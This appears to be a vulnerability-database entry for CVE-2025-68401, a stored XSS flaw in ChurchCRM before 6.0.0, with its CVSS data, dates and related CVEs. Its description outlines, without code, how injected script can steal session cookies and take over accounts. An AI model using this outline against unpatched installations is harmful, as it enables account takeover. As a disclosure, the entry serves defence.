CVE-2025-68401 MEDIUM

CVE-2025-68401: ChurchCRM has Stored Cross-Site Scripting (XSS) vulnerability that leads to session theft and account takeover

Vendor Churchcrm
Product CRM
Weakness CWE-79 · XSS
Published December 17, 2025
Last update December 18, 2025
View on NVD All CVEs

CVSS base score

6.2/10
Attack vector Network
Attack complexity Low
Privileges required High
User interaction
Confidentiality
Integrity

CVSS vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N

What the vulnerability does

01Description

ChurchCRM is an open-source church management system. Prior to version 6.0.0, the application stores user-supplied HTML/JS without sufficient sanitization/encoding. When other users later view this content, attacker-controlled JavaScript executes in their browser (stored XSS). In affected contexts the script can access web origin data and perform privileged actions as the victim. Where session cookies are not marked HttpOnly, the script can read document.cookie, enabling session theft and account takeover. Version 6.0.0 patches the issue.

Key dates

02Disclosure timeline

December 17, 2025 CVE published
December 18, 2025 Record updated

Related vulnerabilities

04Related CVE

CVE-2024-35705 WordPress Block for Font Awesome plugin <= 1.4.4 - Cross Site Scripting (XSS) vulnerability CVE-2025-23886 WordPress Annie plugin <= 2.1.1 - Cross Site Scripting (XSS) vulnerability CVE-2026-39514 WordPress Paid Member Subscriptions plugin <= 2.17.3 - Reflected Cross Site Scripting (XSS) vulnerability CVE-2023-41681 CVE-2026-1945 WPBookit <= 1.0.8 - Unauthenticated Stored Cross-Site Scripting via 'wpb_user_name' and 'wpb_user_email' Parameters